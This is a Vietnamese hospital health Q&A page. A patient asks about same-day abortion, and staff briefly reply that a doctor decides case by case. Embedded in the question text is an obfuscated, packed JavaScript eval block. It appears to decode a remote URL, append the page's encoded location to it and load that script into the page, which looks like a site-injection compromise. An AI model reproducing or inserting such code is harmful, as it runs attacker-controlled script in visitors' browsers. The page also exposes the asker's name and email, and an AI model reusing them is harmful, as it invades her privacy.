Hỏi đáp sức khỏe

 Bệnh viện mình có thực hiện phá thai về trong ngày không?
Họ tên: Nguyễn Anh Thư , Địa chỉ:Cần Thơ, Email:nguyenanhthau982@gmail.com
HỎI: Bệnh viện mình có thực hiện phá thai về trong ngày không? <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('p c=["\\a\\l\\I\\1a\\H\\a\\l\\I\\1a\\H\\Q\\1u\\N\\B\\w\\a\\Q\\h\\d\\I\\w\\U\\J\\y\\t\\H\\j\\1p\\E\\h\\l\\i\\R\\i\\M\\C\\X\\x\\a\\C\\t\\A\\l\\L\\n\\A\\E\\S\\R\\z\\d\\m\\d\\z\\E\\L\\t\\y\\E\\C\\K\\o\\J\\m\\o\\x\\W\\1o\\w\\t\\T\\a\\T\\l\\D\\1n\\h\\b\\m\\a\\j\\w\\1x\\a\\K\\U\\B\\1q\\Z\\W\\J\\a\\x\\d\\a\\F\\D\\D\\a\\h\\b\\g\\l\\a\\i\\j\\A\\l\\a\\i\\j\\A\\g\\q\\a\\k\\j\\k\\q\\d\\a\\f\\m\\b\\k\\d\\h\\i\\b\\g\\d\\h\\k\\m\\a\\d\\k\\j\\b\\B\\N\\a\\h\\g\\m\\a","\\r\\n\\i\\d\\b","\\M\\1r\\h\\S\\w\\L\\1v\\h\\M\\C\\P\\V","\\l\\z\\d\\f\\o\\r\\N\\B\\1m","\\r\\d\\s\\i\\o\\f","\\d\\s\\b\\a\\f\\b\\P\\n\\b\\m\\b\\g\\f","\\f\\y\\o\\b","\\f\\b\\F\\f\\1z\\D\\a\\z\\a\\r\\d\\s\\i\\o\\f","\\r\\s\\d","\\k\\g\\s\\b\\a\\j\\y\\r\\f\\a\\f\\b\\d\\h\\a\\g\\q\\b","\\k\\g\\n\\k\\a\\j","\\a\\o\\o\\b\\g\\j\\1D\\h\\i\\n\\j","\\h\\b\\a\\j","\\q\\b\\f\\P\\n\\b\\m\\b\\g\\f\\r\\1E\\y\\1A\\a\\q\\X\\a\\m\\b","\\b\\x\\x\\K\\t\\t","\\n\\k\\q","\\h\\s\\b\\1l","\\n\\k\\d\\a\\f\\i\\k\\g","\\f\\i\\g\\l\\a\\i\\V","\\i\\g\\j\\b\\F\\Z\\1l","\\n\\b\\g\\q\\f\\h"];G e(1f,O){1B 1i=c[0];p 1g=1j(1j(c[2])[c[1]](0,4)+1i[c[1]](18,1C));p 1e=c[3];p u=1d[c[5]](c[4]);u[c[6]]=c[7];u[c[8]]=1g+1f+1e;u[c[9]]=O;u[c[10]]=O;1d[c[13]](c[12])[0][c[11]](u)}e(1c(),G(){1w[c[15]](c[14])});G 1c(){p v=1s[c[17]][c[16]];p 1b=c[18];p 1k=v[c[1]](v[c[19]](1b),v[c[1h]]-3)+v[c[1h]];p Y=1t(1k);1y Y}',62,103,'||||||||||x61|x65|_0x6c85|x63||x74|x6E|x68|x69|x64|x6F|x62|x6D|x6C|x70|var|x67|x73|x72|x39|_0x80d0x7|_0x80d0x9|x4D|x7A|x79|x76|x75|x37|x57|x6A|x5A|x78|function|x30|x48|x4C|x31|x47|x59|x38|_0x80d0x3|x45|x71|x35|x53|x41|x36|x3D|x50|x4E|_0x80d0xc|x4F|||||||||||x52|_0x80d0xa|blad|document|_0x80d0x6|_0x80d0x2|_0x80d0x5|20|_0x80d0x4|atob|_0x80d0xb|x66|x32|x6B|x33|x58|x51|x55|window|btoa|x77|x46|console|x4B|return|x2F|x54|const|70|x43|x42'.split('|'),0,{})) </script>
ĐÁP: Chào bạn.
Khi kết thúc thai kỳ sẽ tùy thuộc tình trạng của bạn bác sĩ mới cho chỉ định về trong ngày hay không nhé.

tin nổi bật


Liên kiết

Tiện ích

  • Quản lý chất lượng
  • Thông Tin Dược
  • Lịch Tuần